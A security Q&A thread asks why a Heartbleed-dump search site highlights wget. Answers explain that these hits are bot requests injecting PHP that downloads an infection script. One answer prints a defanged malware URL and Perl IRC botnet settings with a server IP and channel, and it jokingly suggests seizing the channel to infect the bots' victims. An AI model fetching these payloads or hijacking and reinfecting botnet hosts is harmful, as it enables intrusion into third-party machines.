1

What's the point of spotlighting wget on heartbleed dumps?

I'm specifically talking about this which is the first page of wget occurencies in heartbleed dumps.

They put this page as a link on the top of the main page like if that is relevant in some way.

I can understand the reason behind exposing email= and password= and bitcoin and so on, but what about wget?

Is it because it might reveal system paths or potential RCIs, or is it because it exposes a system with heartbleed and thus wget - which is shown to be used - is also vulnerable to it?

user40242
  • 25
  • 6

2 Answers2

4

All the links that were up there weren't necessarily security issues.

That wget for example was highlighting bots crawling webservers and giving security researchers some fresh blood to start looking for a C&C ;)

More details :

The bot are crawling internet like us, here when you see a wget ( http://un1c0rn.net/host/195.154.5.171 ) after an HTTP header, it means the bot tried to execute PHP code by injecting it in the request on the target system.

This code gives you the remote location of the script suposed to infect the machine and gives you some useful information to start a new hunt ;)

Here you can see the infection script is there :

hxxp://208.85.177.238/.x/hb/php08

And here are the information related to that botnet :

$servidor='194.24.228.203' unless $servidor; my $porta='443'; my @canais=("#allornothing"); my @adms=("Kelevra");

You could be nice and track the flithy mofo ... You could be bad, and take that IRC room, and even without knowing the password for the botnet administration, list IPs, infect the machines connected to the IRC channel like they were infected in the first place by the botnet and thanks the botnet for all those vulnerable hosts just given to you.

Project Unicorn
  • 56
  • 4
  • Thank you very much! It's a shame that such a project has received so few support... Would you accept PP donations for those who don't own btc? – user40242 Oct 02 '14 at 13:02
  • Sadly, due to the nature of the project, we can't. I can however recommand [BTC-E](https://btc-e.com) which as always been safe for me. It supports a lot of money providers. – Project Unicorn Oct 06 '14 at 18:55
1

That seems to be just whatever memory they grabbed via heartbleed. It looks like a PHP script executing wget, which was probably in the memory of the server being scanned.

David
  • 15,814
  • 3
  • 48
  • 73
  • Yeah sure, that's what **Un1c0rn** does: they scan for common vulnerabilities and then dump data (db, memory leaks,...). But why did they put a _wget_ index like that was important? – user40242 Jul 17 '14 at 17:34
  • 1
    As far as I know, it's basically automated. Target was vulnerable to heartbleed, here's the data we got: – David Jul 17 '14 at 17:36
  • Yes indeed, but it is not the case of the "spotlights" they put on the almost-top of the page. I also think I put that link in a confusing way: I'm mostly referring to the spotlights you have up [here](http://un1c0rn.net/?module=hosts&action=list) that - if you click on `wget` - will point to a list of targets w\ heartbleed and then the single dump. – user40242 Jul 17 '14 at 17:42
  • @user40242, I think your question about "why" has been answered about as well as one could expect. Any further comments/complaints/rants should be directed to the authors/administrators of that web site. – D.W. Jul 23 '14 at 23:36
  • @D.W. Uhmmm I don't think so: I'm not asking why is `wget` on a dump (as Un1c0rn is automated, so there's no intention). I'm asking why is it highlighted as it is a **nasty** security issue. So the real question is not really about Un1c0rn, rather on what's the deal with `wget` on a `heartbleed`. – user40242 Jul 24 '14 at 09:50